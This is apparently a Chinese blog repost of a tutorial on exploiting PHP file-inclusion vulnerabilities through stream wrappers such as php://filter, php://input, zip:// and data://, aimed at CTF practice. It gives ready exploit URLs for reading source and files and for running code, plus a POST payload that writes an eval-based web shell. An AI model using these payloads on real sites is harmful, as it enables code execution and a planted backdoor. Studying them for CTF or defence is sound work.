php伪协议实现命令执行

最新推荐文章于 2023-04-02 17:25:44 发布
最新推荐文章于 2023-04-02 17:25:44 发布
阅读量619 收藏 1
点赞数 1
分类专栏: web
原文链接:https://www.freebuf.com/column/148886.html
版权
  • 单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞

航舰的文件包含函数:

  • include
  • require
  • include_once
  • hightlight_file
  • show_sourcce
  • readfile
  • file_get_contents
  • fopen
  • file
    封装协议:
  • file://
  • php://filter
  • php://input
  • zip://
  • compress.bzip2://
  • compress.zlib://
  • data://

环境概要:

php.ini:
allow_url_fopen:on 默认开启 激活了URL形式的fopen封装协议使得可以访问URL对象文件
allow_url_include:off 默认关闭,该选项on便是允许URL对象文件

  • PHP版本<=5.2可以使用%00进行截断

0x01 是否需要截断?

①:不需要截断:

http://127.0.0.1/test.php?file=file:///c:/users/Thinking/desktop/flag.txt<?phpinclude($_GET['file'])?>

②:需要截断:在php版本<=5.2中进行测试是可以使用%00截断的。

http://127.0.0.1/test.php?file=file:///c:/users/Thinking/desktop/flag.txt%00<?phpinclude($_GET['file'].’.php’)?>

0x02 allow_url_fopen与allow_url_include是否开启:

  • file://在双OFF下可以使用;
    在这里插入图片描述
    使用方法:
file:// [文件的绝对路径和文件名]
http://127.0.0.1/cmd.php?file=file://D:/soft/phpStudy/WWW/phpcode.txt
  • php://
    条件:
    不需要开启allow_url_fopen,仅php://input,php://stdin,php://memory和php://temp需要开启allow_url_include.
    php://访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input.php://filter用于读取源码,php://input用于执行php代码.
    php://filter 读取源代码并进行base64编码编出,不然会直接当作php带啊执行就看不到源代码内容.
php://filter/convert.base64-[encode/decode]/resource=xxx
  • php://在双off下可以正常使用
    在这里插入图片描述
    实例:
http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=./cmd.php

page=php://filter/read=convert.base64-encode/resource=index.php
读取网页源码

这里还可以把read=string.tolower/resource=… 可以直接读取源码

  • php://input可以访问请求的原始数据的只读流,将pos请求中的数据作为php代码执行.
    实例:
http://127.0.0.1/cmd.php?file=php://input
[POST DATA]: <?php phpinfo();?>

也可以post以下内容生成一句话:


<?
php fputs(fopen(“shell.php”,”w”),
’<?php eval($_POST["cmd"];?>’);
?>
  • zip://,bzip://,zlib://协议在双off的情况下也可以正常使用
    上述均属于压缩流,可以访问压缩文件的子文件,更重要的是不需要指定后缀名
    • zip://
      使用方法:
zip://archive.zip#dir/file.txtzip:// [压缩文件绝对路径]#[压缩文件内的子文件名]

实例:

http://127.0.0.1/cmd.php?file=zip://D:/soft/phpStudy/WWW/file.jpg%23phpcode.txt
  • zlib://协议
compress.zlib://file.gz

测试现象:

http://127.0.0.1/cmd.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpgorhttp://127.0.0.1/cmd.php?file=compress.zlib://./file.jpg

  • zlib可以打开.gz和.jpg

  • data://
    双On

http://127.0.0.1/cmd.php?file=data://text/plain,<?php phpinfo()?>orhttp://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4= 也可以:http://127.0.0.1/cmd.php?file=data:text/plain,<?php phpinfo()?>orhttp://127.0.0.1/cmd.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
鱼开yk2
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议
等风来
05-22 9867
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行PHP 脚本所在位置的绝对路径。
PHP伪协议详解
m0_67401228的博客
08-02 1416
phpexit();亦或者phpexit();?这样即使插入了一句话木马,在被使用的时候也无法被执行。这样的死亡exit通常存在于缓存、配置文件等等不允许用户直接访问的文件当中。
PHP伪协议实现命令执行
Huamang的博客
12-01 298
PHP伪协议实现命令执行 转载于https://www.freebuf.com/column/148886.html 首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file,计划对文件包含漏洞与php封装协议的利用方法进行总结,本篇先总结下一些封装协议,涉及的相关协议:file://、php://filter、p
【转载】php伪协议实现命令执行的七种姿势
gclome的博客
11-08 326
原文 首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file,计划对文件包含漏洞与php封装协议的利用方法进行总结,本篇先总结下一些封装协议,涉及的相关协议:file://、php://filter、php://input、zip://、compress.bzip2://、compress.zlib://、da
php伪协议实现命令执行的七种姿势
大方子
09-06 1599
文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file 。 首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_...
php伪协议实现命令执行,任意文件读取
qq_44418229的博客
06-09 6938
ctf----php伪协议
PHP伪协议
m0_75178803的博客
04-02 1189
可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行,从而导致任意文件读取协议参数:常用的有。
php伪协议.pdfphp伪协议.pdfphp伪协议.pdf
最新发布
02-24
PHP 伪协议是一种特殊的 URL 格式,用于在 PHP 代码中执行特定的操作。这些伪协议主要用于处理文件读取、网络请求以及数据处理等方面。理解并恰当地使用 PHP 伪协议对于开发安全、高效的 PHP 应用程序至关重要。 ##...
php输入流php://input使用浅析
10-25
主要介绍了php输入流php://input使用浅析,本文只是作为一个简单的了解,给出的例子也相对简单,需要的朋友可以参考下
ctf中常用的PHP伪协议
weixin_35756637的博客
01-02 759
在CTF比赛中,常常会使用PHP伪协议来绕过服务器的安全限制或者执行本不应该执行的操作。 PHP伪协议有几种常见的形式: data: 协议 这种形式的PHP伪协议通常用于在HTML中嵌入PHP代码,例如: <imgsrc="data:image/png;base64,PHP_CODE_HERE"> php: 协议 这种形式的PHP伪协议通常用于在浏览器中执行PHP代码,例如:...
php伪协议使用示例
XiaoXiao_RenHe的专栏
03-31 453
文件包含漏洞利用,php伪协议php://input 输入流,或本地包含,nginx的access.log写入一句话木马,蚁剑链接服务器成功。
PHP代码审计 07 PHP伪协议和文件包含
kevinhanser
07-20 932
本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程 PHP 代码审计博客目录 1. 简介 php 伪协议 file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams) zlib:// — ...
buuctf WEB前四题知识点学习
苗_的博客
12-17 802
buuctf前四题知识点
php伪协议
weixin_60719780的博客
01-27 4846
PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
php://input的用法
sunsineq的专栏
04-07 4404
$data=file_get_contents("php://input");   php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充, 比激活 alwa...
PHP伪协议详解:访问数据源与执行操作
"PHP伪协议PHP中一种特殊的数据访问机制,它允许开发者通过php://前缀结合特定的协议标识符来实现对不同数据源的访问。这些协议并不实际连接到网络,而是提供了对PHP自身功能的接口。下面将详细讨论PHP伪协议的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值